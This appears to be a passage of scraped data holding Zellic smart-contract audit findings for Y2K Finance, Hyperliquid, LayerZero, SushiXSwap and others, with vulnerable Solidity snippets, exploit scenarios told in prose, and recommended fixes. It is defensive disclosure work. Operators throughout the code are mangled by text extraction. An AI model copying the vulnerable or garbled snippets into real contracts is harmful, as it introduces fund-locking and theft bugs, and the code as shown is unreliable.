swapAndBridge, there is a lack of validation for the payload or bridgePayload data provided by users, which is trans- mitted to the stargateRouter contract for subsequent transmission to the destination chain. The sgReceive function expects that _payload will include the receiver address, the vault\u2019s epoch id, and the vaultAddress. However, if the data type mismatches the expected format, the refund process using the _stageRefund function will not occur as the function call will result in a revert. function sgReceive( uint16 _chainId, bytes memory _srcAddress, uint256 _nonce, address _token, uint256 amountLD, bytes calldata _payload ) external payable override { if (msg.sender !) stargateRelayer &) msg.sender !) stargateRelayerEth) revert InvalidCaller(); (address receiver, uint256 id, address vaultAddress) = abi.decode( _payload, (address, uint256, address) ); if (id =) 0) return _stageRefund(receiver, _token, amountLD); if (whitelistedVault[vaultAddress] !) 1) return _stageRefund(receiver, _token, amountLD); bool success = _depositToVault(id, amountLD, _token, vaultAddress); if (!success) return _stageRefund(receiver, _token, amountLD); receiverToVaultToIdToAmount[receiver][vaultAddress][id] += amountLD; emit ReceivedDeposit(_token, address(this), amountLD); } Zellic Y2K Finance The absence of proper payload validation exposes the system to potential issues, as incorrect or malformed payloads could cause the subsequent sgReceive function call from the zapDest contract to revert. Such reverts could lead to locked funds and hinder the expected behavior of the system. Instead of accepting raw payload data from users, we recommend encoding the pay- load data directly inside the functions bridge, permitSwapAndBridge, and swapAndBrid ge. This ensures that the payload is created according to the expected format and reduces the likelihood of incorrect payloads causing reverts of calls in the destination contract. If the payload must be provided by users, we recommend to implement robust input validation mechanisms to ensure that only valid and properly formatted payloads are accepted. This issue has been acknowledged by Y2K Finance, and a fix was implemented in commit 56a1461. Zellic Y2K Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Y2K Finance - Zellic Audit Report.pdf" + }, + { + "title": "3.5 Incorrect loop implementation in the function clearQueued Deposits", + "labels": [ + "Zellic" + ], + "body": "Target: StrategyVault Category: Coding Mistakes Likelihood: Medium Severity: Low : Low The function clearQueuedDeposits is used to clear a fixed amount of deposits in the queue. This function loops through the queueDeposits mapping and pops the last el- ement of the array while minting shares to the expected receivers in that mapping. The issue is that the array indexing used to access queueDeposits is incorrect because the array index will be out of bound in many cases. Shown below is the relevant part of the code: function clearQueuedDeposits( uint256 queueSize ) external onlyOwner returns (uint256 pulledAmount) { /)...)) for (uint256 i = depositLength - queueSize; i < queueSize; ) { QueueDeposit memory qDeposit = queueDeposits[queueSize - i - 1]; uint256 shares = qDeposit.assets.mulDivDown( cachedSupply, cachedAssets ); In many cases the function might revert. Consider changing the code to the following: function clearQueuedDeposits( uint256 queueSize ) external onlyOwner returns (uint256 pulledAmount) { /)...)) for (uint256 i = depositLength; i > depositLength - queueSize; ) { Zellic Y2K Finance QueueDeposit memory qDeposit = queueDeposits[i - 1]; /)...)) unchecked { i-); } The issue was fixed in commit cf415dd. Zellic Y2K Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Y2K Finance - Zellic Audit Report.pdf" + }, + { + "title": "3.6 Lack of data validation for trustedRemoteLookup", + "labels": [ + "Zellic" + ], + "body": "Target: zapDest Category: Coding Mistakes Likelihood: Low Severity: Informational : Informational The current implementation of the lzReceive function lacks checks to verify the va- lidity of the data stored in trustedRemoteLookup[_srcChainId] and _srcAddress bytes. If trustedRemoteLookup[_srcChainId] is not set and _srcAddress is zero bytes, the re- sult of the check if (keccak256(_srcAddress) !) keccak256(trustedRemoteLookup[_s rcChainId])) will be true because keccak256(\u201c\u201d) =) keccak256(\u201c\u201d). function lzReceive( uint16 _srcChainId, bytes memory _srcAddress, uint64 _nonce, bytes memory _payload ) external override { if (msg.sender !) layerZeroRelayer) revert InvalidCaller(); if ( keccak256(_srcAddress) !) keccak256(trustedRemoteLookup[_srcChainId]) ) revert InvalidCaller(); ...)) } The issue currently has no security impact, because it is not expected that the layerZe- roRelayer contract will send an empty _srcAddress. But limiting a contract\u2019s attack surface is a crucial way to mitigate future risks. To ensure data consistency and avoid potential issues, it is recommended to add the following checks: trustedRemoteLookup[_srcChainId] > 0 Zellic Y2K Finance _srcAddress.length =) trustedRemoteLookup[_srcChainId].length An example of such checks can be found in the implementation provided by LayerZero Labs here. This issue has been acknowledged by Y2K Finance, and a fix was implemented in commit 32eaca8. Zellic Y2K Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Y2K Finance - Zellic Audit Report.pdf" + }, + { + "title": "3.7 Array out-of-bound exception in _removeVaults", + "labels": [ + "Zellic" + ], + "body": "Target: StrategyVault Category: Coding Mistakes Likelihood: Medium Severity: Low : Low The function _removeVaults is a helper function that removes vaults from the vaultLi st. While removing a vault from the middle of the array, it is intended to replace the vault at the last index with the vault to be removed and pop the last vault. The index of the last element of the array should be removeCount - 1 (where removeCo unt = vaults.length), but the function is using the last element as removeCount \u2014 due to which it will revert because it would access element out-of-bounds of the array. Shown below is the relevant part of the code: function _removeVaults( address[] memory vaults ) internal returns (address[] memory newVaultList) { /)...)) } else { if (vaults.length > 1) { vaults[j] = vaults[removeCount]; delete vaults[removeCount]; } else delete vaults[j]; removeCount-); } /)...)) The _removeVaults function would revert in certain cases. Use the correct last array index removeCount - 1 instead of removeCount: function _removeVaults( address[] memory vaults Zellic Y2K Finance ) internal returns (address[] memory newVaultList) { /)...)) } else { if (vaults.length > 1) { vaults[j] = vaults[removeCount]; delete vaults[removeCount]; vaults[j] = vaults[removeCount - 1]; delete vaults[removeCount - 1]; } else delete vaults[j]; removeCount-); } /)...)) The issue was fixed in commit fd2a6f3. Zellic Y2K Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Y2K Finance - Zellic Audit Report.pdf" + }, + { + "title": "3.8 The function _removeVaults returns early", + "labels": [ + "Zellic" + ], + "body": "Target: StrategyVault Category: Coding Mistakes Likelihood: Medium Severity: Low : Low The function _removeVaults is a helper function that removes vaults from the vaultL ist. While removing the vaults, it runs two loops, but the return statement is inside the first loop, due to which this function returns after the first iteration of the first loop. The intended functionality is to return after both the loops are finished. The _removeVaults function would return early, and all the vaults will not be removed from the list as intended. Move the two lines outside of the loop: function _removeVaults( address[] memory vaults ) internal returns (address[] memory newVaultList) { uint256 removeCount = vaults.length; newVaultList = vaultList; for (uint256 i; i < newVaultList.length; ) { for (uint j; j < removeCount; ) { if (vaults[j] =) newVaultList[i]) { /) Deleting the removeVault from the list if (j =) removeCount) { delete vaults[j]; removeCount-); } else { if (vaults.length > 1) { vaults[j] = vaults[removeCount]; delete vaults[removeCount]; } else delete vaults[j]; removeCount-); } Zellic Y2K Finance /) Deleting the vault from the newVaultList list if ( newVaultList[i] =) newVaultList[newVaultList.length - 1] ) { delete newVaultList[i]; } else { newVaultList[i] = newVaultList[newVaultList.length - 1]; delete newVaultList[newVaultList.length - 1]; } } unchecked { j+); } } unchecked { i+); } vaultList = newVaultList; return newVaultList; vaultList = newVaultList; return newVaultList; } } The issue was fixed in commit 945734b and 6bd136c. Zellic Y2K Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Y2K Finance - Zellic Audit Report.pdf" + }, + { + "title": "3.9 The weightStrategy range violation", + "labels": [ + "Zellic" + ], + "body": "Target: StrategyVault Category: Coding Mistakes Likelihood: Low Severity: Low : Low The weightStrategy global variable determines the weight strategy used when de- ploying funds and can take one of three values: 1. for equal weight 2. for fixed weight 3. for threshold weight However, the setWeightStrategy function allows the owner of the contract to set this value to a number less than or equal to strategyCount(), which is equal to 4. function setWeightStrategy( uint8 weightId, uint16 proportion, uint256[] calldata fixedWeights ) external onlyOwner { ...)) if (weightId > strategyCount()) revert InvalidWeightId(); ...)) weightStrategy = weightId; weightProportion = proportion; vaultWeights = fixedWeights; emit WeightStrategyUpdated(weightId, proportion, fixedWeights); } function strategyCount() public pure returns (uint256) { return 4; } If the weightStrategy is set to 4, the fetchWeights function will revert because there is a check that this value cannot be more than 3. As a result, the deployPosition function, Zellic Y2K Finance which is called by the owner of the contract, will also revert, preventing the owner from deploying funds to Y2K vaults. We recommend to change the condition from > to >). function setWeightStrategy( uint8 weightId, uint16 proportion, uint256[] calldata fixedWeights ) external onlyOwner { ...)) if (weightId > strategyCount()) revert InvalidWeightId(); if (weightId >) strategyCount()) revert InvalidWeightId(); ...)) } The issue was fixed in commit 2248d6f. Zellic Y2K Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Y2K Finance - Zellic Audit Report.pdf" + }, + { + "title": "3.10 Incompatibility with USDT token", + "labels": [ + "Zellic" + ], + "body": "Target: VaultController Category: Business Logic Likelihood: Medium Severity: Medium : Medium While depositing ERC-20 tokens to the vault, the contract first approves the token to the vault using safeApprove from the solmate library and then calls deposit on the earthquake vault in a try-catch. The code is as follows: function _depositToVault( uint256 id, uint256 amount, address inputToken, address vaultAddress ) internal returns (bool) { if (inputToken =) sgEth) { try IEarthquake(vaultAddress).depositETH{value: amount}( id, address(this) ) {} catch { return false; } } else { ERC20(inputToken).safeApprove(address(vaultAddress), amount); try IEarthquake(vaultAddress).deposit(id, amount, address(this)) {} catch { return false; } } return true; } If the call to deposit on the earthquake vault fails, it would be caught using the catch statement and the function would simply return false. In this case, the approval would Zellic Y2K Finance not be decreased as the tokens would not be transferred to the earthquake vault. If this token is USDT, subsequent calls to safeApprove will revert, as USDT\u2019s approve function reverts if the current allowance is nonzero. USDT deposits to the earthquake vault might fail in case any deposit to the vault fails. Consider changing the code to the following: function _depositToVault( uint256 id, uint256 amount, address inputToken, address vaultAddress ) internal returns (bool) { if (inputToken =) sgEth) { try IEarthquake(vaultAddress).depositETH{value: amount}( id, address(this) ) {} catch { return false; } } else { ERC20(inputToken).safeApprove(address(vaultAddress), 0); ERC20(inputToken).safeApprove(address(vaultAddress), amount); try IEarthquake(vaultAddress).deposit(id, amount, address(this)) {} catch { return false; } } return true; } Zellic Y2K Finance This issue has been acknowledged by Y2K Finance, and a fix was implemented in commit d17e221. Zellic Y2K Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Y2K Finance - Zellic Audit Report.pdf" + }, + { + "title": "3.11 Conversion between different units does not account for token decimals", + "labels": [ + "Zellic" + ], + "body": "Target: HookAave, HookAaveFixYield Category: Business Logic Likelihood: Medium Severity: Medium : Medium The functions _borrow and _repay in the hook contracts are used to borrow and repay to Aave. Taking an example of _repay, this function calculates the amount to be repaid using balanceOf on the variable debt token as well as the current balance of borrow tokens using balanceOf on the borrow token. If the amount to be repaid is greater than the current balance of borrow tokens, the function _swapForMissingBorrowToken withdraws the deposit token and swaps these tokens to borrow tokens to repay the amount to Aave. The amount to be withdrawn is calculated by the following code: function _swapForMissingBorrowToken( address borrowToken, uint256 amountNeeded ) internal { ERC20 depositToken = strategyDepositToken; uint256 exchangeRate = (aaveOracle.getAssetPrice(borrowToken) * 105e16) / aaveOracle.getAssetPrice(address(depositToken)); uint256 amountToWithdraw = ((exchangeRate * amountNeeded) / 1e18); _withdraw(amountToWithdraw, false); _swap(amountToWithdraw, depositToken, 1); } Although this would work if both tokens are of the same decimals, there would be an issue if these tokens (depositToken and borrowToken) are of different decimals. For example, if borrowToken is ETH and depositToken is USDC, and the amountNeeded is 100 ETH, assuming the price of ETH to be $1,200, the value of amountToWithdraw would be calculated as 126,000e18 whereas it should be 126,000e6. The same issue is also present in the _repay function. Zellic Y2K Finance Incorrect decimal conversion might lead to incorrect values during _borrow and _rep ay. Take into account the decimals for all the tokens while such conversions take place. The issue was fixed in commits 80da566 and 0db93f7. Zellic Y2K Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Y2K Finance - Zellic Audit Report.pdf" + }, + { + "title": "3.12 Malicious users can profit due to temporary exchange rate fluctuations", + "labels": [ + "Zellic" + ], + "body": "Target: StrategyVault Category: Business Logic Likelihood: Low Severity: Medium : Medium When a position is closed by calling closePosition, the deposit queue is cleared by pulling funds from the queue contract using the function _pullQueuedDeposits. The function _pullQueuedDeposits is only called when the length of queueDeposits is less than maxQueuePull. If the length of this queueDeposits array is greater than maxQueuePull, the queue is first reduced using the function clearQueuedDeposits. The relevant part of the code is shown below: function closePosition() external onlyOwner { if (!fundsDeployed) revert FundsNotDeployed(); /)...)) fundsDeployed = false; /)...)) uint256 queueLength = queueDeposits.length; if (queueLength > 0 &) queueLength < maxQueuePull) _pullQueuedDeposits(queueLength); } There may be a scenario where either the owner forgets to call the clearQueuedDepos its function before closePosition or a malicious user front-runs the owner\u2019s closeP osition call to increase the length of the queue such that _pullQueuedDeposits is not called. In both these cases, the queue will not be cleared, but fundsDeployed would be set to false. If the owner later tries to clear the queue by calling the function clearQueuedDeposits multiple times, the exchange rate would temporarily fluctuate. This is due to a bug in the function clearQueuedDeposits. While clearing part of the queue, the function pulls all the funds from the QueueCon- tract. At this time, the totalSupply is only increased by a small amount, but totalAss ets is increased by a large amount. The exchange rate would again reach back to the Zellic Y2K Finance expected amount when the entire queue is cleared, but between the calls to clearQ ueuedDeposits, the exchange rate is incorrect. A malicious user can profit by calling withdraw between these calls as they would receive more assets than they should. A malicious user can sell shares at higher price than expected. In the function clearQueuedDeposits, only the assets that are removed from the queue should be pulled from the QueueContract. The issue was fixed in commit 86e24fe. Zellic Y2K Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Y2K Finance - Zellic Audit Report.pdf" + }, + { + "title": "3.13 Incorrect weights calculation", + "labels": [ + "Zellic" + ], + "body": "Target: PositionSizer Category: Coding Mistakes Likelihood: Medium Severity: Medium : Medium The function _thresholdWeight performs a calculation of weights for a set of vaults based on their return on investment (ROI) compared to a threshold value. However, during the process of identifying valid vaults, the validIds array is populated with both valid indexes and zeros, which leads to unintended behavior. The second loop iterates over this array to calculate weights only until validCount. But validCount is less than the actual validIds size. So the weights will be calculated only for the first validCount elements from the validIds array, regardless of whether they are valid indexes or zeros. function _thresholdWeight( address[] memory vaults, uint256[] memory epochIds ) internal view returns (uint256[] memory weights) { ...)) for (uint256 i; i < vaults.length; ) { uint256 roi = _fetchReturn(vaults[i], epochIds[i], marketIds[i]); if (roi > threshold) { validCount += 1; validIds[i] = i; } unchecked { i+); } } ...)) uint256 modulo = 10_000 % validCount; for (uint j; j < validCount; ) { uint256 location = validIds[j]; weights[location] = 10_000 / validCount; if (modulo > 0) { weights[location] += 1; modulo -= 1; } Zellic Y2K Finance unchecked { j+); } } } This behavior leads to missing weights calculations for a portion of the valid vaults. We recommend correcting the second loop so that it iterates the entire length of the validIds array and counts the weights only if the validIds[j] is not zero. The issue was fixed in commit d9ee9d3. Zellic Y2K Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Y2K Finance - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Withdrawal finalization does not work", + "labels": [ + "Zellic" + ], + "body": "Target: Bridge2 Category: Coding Mistakes Likelihood: High Severity: High : High The single entry point for finalizing withdrawals is the batchedFinalizeWithdrawals function, which iterates over an array of messages and calls finalizeWithdrawal on each. Both functions have the nonReentrant modifier. function batchedFinalizeWithdrawals( bytes32[] calldata messages ) external nonReentrant whenNotPaused { checkFinalizer(msg.sender); uint64 end = uint64(messages.length); for (uint64 idx; idx < end; idx+)) { finalizeWithdrawal(messages[idx]); } } function finalizeWithdrawal(bytes32 message) private nonReentrant whenNotPaused { require(!finalizedWithdrawals[message], \u201dWithdrawal already finalized\u201d); Withdrawal memory withdrawal = requestedWithdrawals[message]; checkDisputePeriod(withdrawal.requestedTime, withdrawal.requestedBlockNumber); finalizedWithdrawals[message] = true; usdcToken.transfer(withdrawal.user, withdrawal.usdc); emit FinalizedWithdrawal( FinalizedWithdrawalEvent({ user: withdrawal.user, Zellic Hyperliquid usdc: withdrawal.usdc, nonce: withdrawal.nonce, message: withdrawal.message }) ); } Any finalization attempt will immediately revert because of the nonReentrant mod- ifier on finalizeWithdrawal, preventing any withdrawal from the bridge from being finalized. We classified this issue as high severity due to the fundamental importance of the finalization step for the contract operation. We recommend removing the nonReentrant modifier from the private finalizeWithd rawal function and adding test cases to ensure its correct behavior. This issue has been acknowledged by the Hyperliquid contributors, and a fix was im- plemented in commit e5b7e068. Zellic Hyperliquid", + "html_url": "https://github.com/Zellic/publications/blob/master/Hyperliquid - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Disputed actions are not blocked by validator rotation", + "labels": [ + "Zellic" + ], + "body": "Target: Bridge2 Category: Business Logic Likelihood: Low Severity: High : Medium The bridge implements a two-step mechanism for performing withdrawals and val- idator set changes. First, a request authorizing the action has to be submitted. The request has to be signed by a two thirds majority of validators. If the request is valid, it is recorded in the contract storage. The second step, finalization, actually performs the requested action and can only occur after a dispute period has elapsed. The dispute period gives the opportunity to pause the contract in the event of one or more validators being compromised. Un- pausing the contract also requires to rotate the validator set, allowing replacement of the compromised validators. However, the current implementation does not allow to remove pending operations. For example, if a malicious withdrawal was detected and the contract was paused, the operation would stay pending and could be processed when the contract is unpaused. If a sufficiently large subset of hot wallets is compromised, the dispute period does not effectively allow malicious withdrawals or validator set updates to be blocked. Even if validators are rotated, pending actions would still be able to be finalized when the contract is unpaused. We recommend adding a mechanism for invalidating pending messages. For exam- ple, this could be implemented in the emergencyUnlock function. This issue has been acknowledged by the Hyperliquid contributors, and a fix was im- plemented in commit 8c4a182a. Zellic Hyperliquid", + "html_url": "https://github.com/Zellic/publications/blob/master/Hyperliquid - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Missing message validation may allow griefing", + "labels": [ + "Zellic" + ], + "body": "Target: Bridge2 Category: Business Logic Likelihood: Low Severity: Informational : Informational The finalizeWithdrawals function does not check that the given message corresponds to an existing withdrawal request. Since the uninitialized values of the corresponding withdrawal data will be zero, the call to checkDisputePeriod will pass: function checkDisputePeriod(uint64 time, uint64 blockNumber) private view { require( block.timestamp > time + disputePeriodSeconds &) (uint64(block.number) - blockNumber) * blockDurationMillis > 1000 * disputePeriodSeconds, \u201dStill in dispute period\u201d ); } When messages do not correspond to existing withdrawals, they will cause a transfer of zero tokens to the zero address. In the case of USDC on Arbitrum, this will currently result in a revert. However, if this logic is reused for other ERC-20 tokens, there is no guarantee that such a call will be blocked. Then, although the message does not correspond to an existing withdrawal, it will be marked as finalized, anyway: finalizedWithdrawals[message] = true; usdcToken.transfer(withdrawal.user, withdrawal.usdc); Thus, any future attempts to finalize that message will fail. If an attacker is able to 1. predict upcoming nonces, or 2. front-run withdrawal requests, Zellic Hyperliquid they would be able to block real withdrawals from being finalized. Consider checking that messages correspond to existing withdrawals during the fi- nalization process. In the case of USDC, this has the additional benefit of improving the error message. This issue has been acknowledged by the Hyperliquid contributors, and a fix was im- plemented in commit 1c8d3333. Zellic Hyperliquid", + "html_url": "https://github.com/Zellic/publications/blob/master/Hyperliquid - Zellic Audit Report.pdf" + }, + { + "title": "3.4 Signatures may be reused across different contracts", + "labels": [ + "Zellic" + ], + "body": "Target: Signature Category: Business Logic Likelihood: Low Severity: Informational : Informational On the Arbitrum side, the bridge operates by allowing users to perform actions ap- proved by validators. For instance, to request a withdrawal, the user needs at least two thirds of the validators (if validator power is equally distributed) to sign off us- ing their in-memory hot keys. The bridge checks these signatures, and if the user is indeed permitted to perform the withdrawal, it transfers them the USDC. Currently, signatures include a domain separator to prevent reuse across different chains and projects. This is important to ensure that they are specific to the context in which they are used and cannot be maliciously repurposed. function makeDomainSeparator() view returns (bytes32) { return keccak256( abi.encode( EIP712_DOMAIN_SEPARATOR, keccak256(bytes(\u201dExchange\u201d)), keccak256(bytes(\u201d1\u201d)), block.chainid, VERIFYING_CONTRACT ) ); } However, the signatures do not include the contract or token address. The fact that the domain separator does not by default include any contract-specific data introduces some maintenance risk: the protocol must ensure that signatures can- not be reused across contracts on the same chain. For instance, if the exact same contract were used for a different ERC-20 token, an attacker may be able to steal funds by replaying withdrawal messages. Zellic Hyperliquid We recommend including either the contract address or the token address in signa- tures (either the domain separator or in the message itself) to increase robustness and avoid future issues. This issue has been acknowledged by the Hyperliquid contributors, and a fix was im- plemented in commit 97225667. Zellic Hyperliquid", + "html_url": "https://github.com/Zellic/publications/blob/master/Hyperliquid - Zellic Audit Report.pdf" + }, + { + "title": "3.5 Withdrawal and validator update signatures include no ac- tion", + "labels": [ + "Zellic" + ], + "body": "Target: Bridge2 Category: Business Logic Likelihood: N/A Severity: Informational : Informational To include important parameters in signatures, the bridge packs them together and hashes them. This data is stored in the connectionId slot of the Agent struct, which has an associated function hash for creating the actual signed message. struct Agent { string source; bytes32 connectionId; } In some functions, the hashed data in connectionId includes the name of an action: Agent memory agent = Agent(\u201da\u201d, keccak256(abi.encode(\u201dmodifyLocker\u201d, locker, isLocker, nonce))); However, the connectionIds used in the requestWithdrawal and updateValidatorSet Agent\u2019s do not. Instead, they rely on the arguments being different to prevent valid signatures from being used in the wrong function. From requestWithdrawal and upda teValidatorSet: Agent memory agent = Agent(\u201da\u201d, keccak256(abi.encode(msg.sender, usdc, nonce))); Agent memory agent = Agent( \u201da\u201d, keccak256( abi.encode( newValidatorSet.epoch, newValidatorSet.hotAddresses, newValidatorSet.coldAddresses, newValidatorSet.powers ) ) Zellic Hyperliquid ); This introduces some maintenance risk: updating these signature arguments may have the unintended consequence of allowing confusion between the two types. That might allow users to use withdrawal signatures to maliciously update validators. We recommend consistently prefixing all messages with the action to guarantee that changes in arguments do not cause bugs. This issue has been acknowledged by the Hyperliquid contributors, and a fix was im- plemented in commit b198269c. Zellic Hyperliquid", + "html_url": "https://github.com/Zellic/publications/blob/master/Hyperliquid - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Using non-contract address as destination blocks future mes- sages", + "labels": [ + "Zellic" + ], + "body": "Target: Endpoint Category: Coding Mistakes Likelihood: Medium Severity: Low : Low An improperly-configured user application (UA) can permanently block itself from communicating with an endpoint by simply sending a message to a UA address that is not a contract. If a UA sends a message with a destination UA address that is not a contract, the following try/catch statement does not catch the exception (as the control structure only catches failures in an external call) causing a revert on the destination chain: try ILayerZeroReceiver(_dstAddress).lzReceive{gas: _gasLimit}(_srcChainId , _srcAddress, _nonce, _payload) { /) success, do nothing, end of the message delivery } catch (bytes memory reason) { /) revert nonce if any uncaught errors/exceptions if the ua chooses the blocking mode storedPayload[_srcChainId][_srcAddress] = StoredPayload(uint64( _payload.length), _dstAddress, keccak256(_payload)); emit PayloadStored(_srcChainId, _srcAddress, _dstAddress, _nonce, _payload, reason); } If the destination chain reverts, the source chain\u2019s nonce remains incremented by 1 while the destination chain\u2019s nonce is unchanged. When the nonces are desynchronized, no messages can be sent to any destination UA address because the destination endpoint assumes the messages are out of order. Endpoints key the nonce map with the source chain ID and source UA address\u2014 Zellic LayerZero Labs meaning this issue can only be exploited as self-denial-of-service. Recommendation Add a check to ensure the destination UA is a valid contract address before attempt- ing to execute its lzReceive function. If the contract address is invalid, the endpoint should route the message to a default contract address that discards the message to keep the nonces synchronized. The issue was also discovered in parallel by LayerZero and a fix will be released with UltraLightNode version 2. Zellic LayerZero Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/LayerZero Core - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Out-of-bounds read in __getPrices", + "labels": [ + "Zellic" + ], + "body": "Target: Relayer Category: Coding Mistakes Likelihood: N/A Severity: Informational : Informational The __getPrices function uses the MLOAD instruction to read dstNativeAmt from _ada- pterParameters+66 when txType =) 2: if (txType == 2) { uint dstNativeAmt; assembly { dstNativeAmt :) mload(add(_adapterParameters, 66)) } require(dstConfig.dstNativeAmtCap >) dstNativeAmt, \u201cRelayer: dstNativeAmt too large\u201d); totalRemoteToken = totalRemoteToken.add(dstNativeAmt); } At the start of the function, it checks that the size of _adapterParameters is either 34 bytes or greater than 66 bytes: require(_adapterParameters.length =) 34 |) _adapterParameters.length > 66, \u201cRelayer: wrong _adapterParameters size\u201d); Because the assertion allows an _adapterParameters of a size smaller than the offset added to the size of the memory read, the read could potentially be out of bounds. There is no direct security impact of this instance of out-of-bounds read. However, this code pattern allows undefined behavior and is potentially dangerous. In the past, even low-level vulnerabilities have been chained with other bugs to achieve critical security compromises. Zellic LayerZero Labs Recommendation The size of a uint (which is internally a uint256) is 32 bytes. So, the branch that uses the MLOAD instruction should require that the size of _adapterParameters is greater than or equal to the read size added to offset, or 98 bytes (32+66). The issue has been acknowledged by LayerZero. Zellic LayerZero Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/LayerZero Core - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Messaging library provides a function to renounce owner- ship", + "labels": [ + "Zellic" + ], + "body": "Target: UltraLightNode Category: Business Logic Likelihood: N/A Severity: Informational : Informational The messaging library, UltraLightNode (ULN), implements Ownable which provides a method named renounceOwnership that removes the current owner (reference). This is likely not a desired feature of the ULN. If renounceOwnership were called, the contract would be left without an owner. Recommendation Override the renounceOwnership function: function renounceOwnership() public { revert(\u201cThis feature is not available.\u201d); } The issue has been acknowledged by LayerZero. Zellic LayerZero Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/LayerZero Core - Zellic Audit Report.pdf" + }, + { + "title": "3.1 USDT transfers can be forced to revert for subsequent users", + "labels": [ + "Zellic" + ], + "body": "Target: All Adapters Category: Business Logic Likelihood: Medium Severity: Medium : Medium In several adapters, there are external functions designed specifically for use by SushiXSwapV2. However, users can call these functions without restriction, leading to unintended side effects or malicious actions. function swap( uint256 _amountBridged, bytes calldata _swapData, address _token, bytes calldata _payloadData ) external payable override { ...)) IERC20(rpd.tokenIn).safeIncreaseAllowance(address(rp), _amountBridged); rp.processRoute( rpd.tokenIn, _amountBridged !) 0 ? _amountBridged : rpd.amountIn, rpd.tokenOut, rpd.amountOutMin, rpd.to, rpd.route ); } A malicious user can exploit a specific sequence of function calls to leave an allowance on certain tokens like USDT, which will cause a revert when attempting to approve if Zellic SushiSwap the allowance has not been previously set to 0. An example of this is when a user calls the Axelar adapter\u2019s swap function and provides a specific route to the RouteProcessor that does not fully utilize the allowance. As a result, other users attempting to use the Axelar adapter with USDT will encounter a revert, preventing them from successfully completing the operation. To fix this issue, it is recommended to zero the USDT allowance where applicable. This will ensure that the allowance is properly reset and prevent the above scenario. This finding was fixed in commit b9f1a4ab by changing from a pull method via al- lowances to a push method that directly transfers tokens instead. Zellic SushiSwap", + "html_url": "https://github.com/Zellic/publications/blob/master/SushiXSwap V2 - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Refunds sent to tx.origin", + "labels": [ + "Zellic" + ], + "body": "Target: AxelarAdapter, CCTPAdapter, StargateAdapter Category: Coding Mistakes Likelihood: Low Severity: Low : Low The Axelar, CCTP, and Stargate adapters use tx.origin as the address that receives gas refunds in their implementation of adapterBridge. This might not be the desired recipient of the refund. For example, consider the case of an EOA (user) invoking a contract that in turn calls SushiXSwap to bridge an asset owned by the contract (and paying for gas using the contract balance). A refund for excess gas would be credited to the user, even though the contract has paid for gas. In some cases, gas refunds might be credited to an incorrect recipient. One possible solution is for SushiXSwap to pass the intended recipient for gas refunds to adapterBridge. This way, SushiXSwap could pass msg.sender as the gas refund re- cipient, which seems to be a more sensible choice. This finding was fixed in commit b9f1a4ab by introducing a variable that allows users to specify an address to refund to. Zellic SushiSwap", + "html_url": "https://github.com/Zellic/publications/blob/master/SushiXSwap V2 - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Gas limit ignored by executePayload", + "labels": [ + "Zellic" + ], + "body": "Target: AxelarAdapter, CCTPAdapter, StargateAdapter Category: Coding Mistakes Likelihood: Low Severity: Low : Low The Axelar, CCTP, and Stargate adapters\u2019 implementation of executePayload ignores the PayloadData:)gasLimit field, which seems to be intended to be used as the gas limit for the call to PayloadData:)target. The target of the IPayloadExecutor(pd.target).onPayloadReceive call could use more gas than intended. However, we note that while executePayload is an external func- tion, it is intended to be called by _executeWithToken or _execute, which do limit the gas passed to executePayload, preventing the transaction from consuming all the available gas when the contract is used as intended by the developer. Set the gas limit on the IPayloadExecutor(pd.target).onPayloadReceive call to pd.ga sLimit. This finding was fixed in commit b9f1a4ab by setting the gas limit of the relevant func- tion calls. Zellic SushiSwap", + "html_url": "https://github.com/Zellic/publications/blob/master/SushiXSwap V2 - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Multiple contracts provide a function to renounce owner- ship", + "labels": [ + "Zellic" + ], + "body": "Target: StakingRewards, MUNIState, MUNI Category: Business Logic Likelihood: N/A Severity: Informational : Informational The StakingRewards, MUNIState, and MUNI contracts implement Ownable, which pro- vides a method named renounceOwnership that removes the current owner (refer- ence). This is likely not a desired feature. If renounceOwnership were called, the contract would be left without an owner. Recommendation Override the renounceOwnership function: function renounceOwnership() public { revert(\u201cThis feature is not available.\u201d); } DFX Finance acknowledged this finding and created a fix in pull request #35. Zellic DFX Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Muni - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Lack of interfaces for MUNILogicV1 and MUNI", + "labels": [ + "Zellic" + ], + "body": "Target: MUNILogicV1, MUNI Category: Code Maturity Likelihood: N/A Severity: Informational : Informational Interfaces for the public APIs of MUNILogicV1 and MUNI do not exist. Interactions with smart contracts may be more difficult; it is a composability issue for future developers who want to build upon or understand the codebase. Recommendation We recommend adding all exposed/public APIs to interfaces in a way that accurately reflects the underlying code. DFX Finance acknowledged this finding and created a fix in pull request #37. Zellic DFX Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Muni - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Unhandled division-by-zero error in borrowAsset()", + "labels": [ + "Zellic" + ], + "body": "Target: SiloGateway Category: Coding Mistakes Likelihood: N/A Severity: Informational : Informational In the borrowAsset() function, there is no check for the possibility of totalAsset being 0, which could lead to a division-by-zero error in numerator / totalAsset. function borrowAsset( address _silo, uint256 _borrowAmount, uint256 _collateralAmount, address _collateralAsset, address _receiver ) external nonReentrant { (uint256 totalAsset, ) = ISilo(_silo).totalAsset(); (uint256 totalBorrow, ) = ISilo(_silo).totalBorrow(); uint256 numerator = UTIL_PREC * (totalBorrow + _borrowAmount); uint256 utilizationRate = numerator / totalAsset; ...)) If totalAsset 